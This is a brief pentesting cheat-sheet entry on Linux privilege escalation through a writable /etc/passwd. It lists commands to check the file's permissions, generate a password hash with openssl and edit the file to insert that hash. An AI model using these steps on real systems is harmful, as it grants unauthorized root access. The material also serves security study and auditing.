Writeable /etc/passwd
Investigation and password hash generation
ls -l /etc/passwd
openssl passwd newpasswordhere
nano /etc/passwd
Edit /etc/passwd and add a newly generated password hash

Last updated

